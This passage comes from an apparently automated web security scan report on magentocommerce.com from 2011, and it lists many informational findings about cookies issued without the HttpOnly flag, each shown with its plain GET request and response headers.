4.12. http://www.magentocommerce.com/boards/viewforum/10252/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewforum/10252/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewforum/10252/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176393; expires=Sat, 11-Aug-2012 15:13:13 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewforum%2F10252%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:16 GMT
Content-Length: 112502

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.13. http://www.magentocommerce.com/boards/viewthread/1647/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /boards/viewthread/1647/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /boards/viewthread/1647/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176416; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A24%3A%22%2Fboards%2Fviewthread%2F1647%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Set-Cookie: exp_forum_topics=a%3A0%3A%7B%7D; expires=Sat, 11-Aug-2012 15:13:36 GMT; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:37 GMT
Content-Length: 116291

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.14. http://www.magentocommerce.com/bug-tracking  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /bug-tracking

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bug-tracking HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:13:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176426; expires=Sat, 11-Aug-2012 15:13:46 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fbug-tracking%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:13:46 GMT
Content-Length: 34213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.15. http://www.magentocommerce.com/casestudies  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /casestudies

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /casestudies HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:11:58 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313176318; expires=Sat, 11-Aug-2012 15:11:58 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fcasestudies%2F%22%3Bi%3A1%3Bs%3A46%3A%22%2Fblog%2Fcomments%2Febay-agrees-to-acquire-magento%2F%22%3Bi%3A2%3Bs%3A16%3A%22%2Fknowledge-base%2F%22%3Bi%3A3%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3Bi%3A4%3Bs%3A5%3A%22index%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:11:58 GMT
Content-Length: 52582

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.16. http://www.magentocommerce.com/company/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175799; expires=Sat, 11-Aug-2012 15:03:19 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A9%3A%22%2Fcompany%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:19 GMT
Content-Length: 45865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.17. http://www.magentocommerce.com/company/careers  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/careers

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/careers HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:41 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175820; expires=Sat, 11-Aug-2012 15:03:40 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A17%3A%22%2Fcompany%2Fcareers%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:41 GMT
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.18. http://www.magentocommerce.com/company/contact-us  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:49 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175829; expires=Sat, 11-Aug-2012 15:03:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:49 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.19. http://www.magentocommerce.com/company/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/ HTTP/1.1
Host: www.magentocommerce.com
Proxy-Connection: keep-alive
Referer: http://www.magentocommerce.com/services/descriptions#core-principles-for-theming-in-magento
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=8gleaor858b1qbfp47t52qb1o1; guid=db13949594b1b3d2138f3212e370aacf; homepage_intro=1; exp_domain=c; exp_last_visit=997810899; exp_last_activity=1313170931; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3Bi%3A1%3Bs%3A19%3A%22%2Fservices%2Ftraining%2F%22%3Bi%3A2%3Bs%3A19%3A%22%2Fmedia%2Fscreencasts%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fmedia%2Finterviews%2F%22%3Bi%3A4%3Bs%3A27%3A%22%2Fproduct%2Femerging-business%2F%22%3B%7D; __utma=94789760.769027909.1313156482.1313156482.1313156482.1; __utmb=94789760.7.10.1313156482; __utmc=94789760; __utmz=94789760.1313156482.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:397-EXO-877&token:_mch-magentocommerce.com-1313156482005-48894

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 13:44:08 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313171048; expires=Sat, 11-Aug-2012 13:44:08 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A2%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A3%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3Bi%3A4%3Bs%3A23%3A%22%2Fservices%2Fdescriptions%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 13:44:08 GMT
Content-Length: 59786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.20. http://www.magentocommerce.com/company/contact-us/thank_you  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/contact-us/thank_you

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/contact-us/thank_you HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175794; expires=Sat, 11-Aug-2012 15:03:14 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fcompany%2Fcontact-us%2Fthank_you%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:14 GMT
Content-Length: 32829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.21. http://www.magentocommerce.com/company/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175835; expires=Sat, 11-Aug-2012 15:03:55 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:55 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.22. http://www.magentocommerce.com/company/events/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/events/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/events/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175850; expires=Sat, 11-Aug-2012 15:04:10 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A16%3A%22%2Fcompany%2Fevents%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:11 GMT
Content-Length: 69730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.23. http://www.magentocommerce.com/company/inthepress  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:26 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175806; expires=Sat, 11-Aug-2012 15:03:26 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:26 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.24. http://www.magentocommerce.com/company/inthepress/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/inthepress/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/inthepress/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175861; expires=Sat, 11-Aug-2012 15:04:21 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Finthepress%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:22 GMT
Content-Length: 65303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.25. http://www.magentocommerce.com/company/jobs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/jobs/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/jobs/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:04:50 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175889; expires=Sat, 11-Aug-2012 15:04:49 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A14%3A%22%2Fcompany%2Fjobs%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:04:50 GMT
Content-Length: 133751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.26. http://www.magentocommerce.com/company/leadership  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: exp_last_activity=1313175804; expires=Sat, 11-Aug-2012 15:03:24 GMT; path=/; domain=magentocommerce.com
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fcompany%2Fleadership%2F%22%3Bi%3A1%3Bs%3A10%3A%22%2Fdownload%2F%22%3Bi%3A2%3Bs%3A10%3A%22%2Fpartners%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Fjobs%2F%22%3Bi%3A4%3Bs%3A20%3A%22%2Fcompany%2Fcontact-us%2F%22%3B%7D; path=/; domain=magentocommerce.com
Last-Modified: Fri, 12 Aug 2011 15:03:24 GMT
Content-Length: 51387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

<head>
<!-- meta_
...[SNIP]...
4.27. http://www.magentocommerce.com/company/leadership/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magentocommerce.com
Path:   /company/leadership/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /company/leadership/ HTTP/1.1
Host: www.magentocommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Fri, 12 Aug 2011 15:03:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
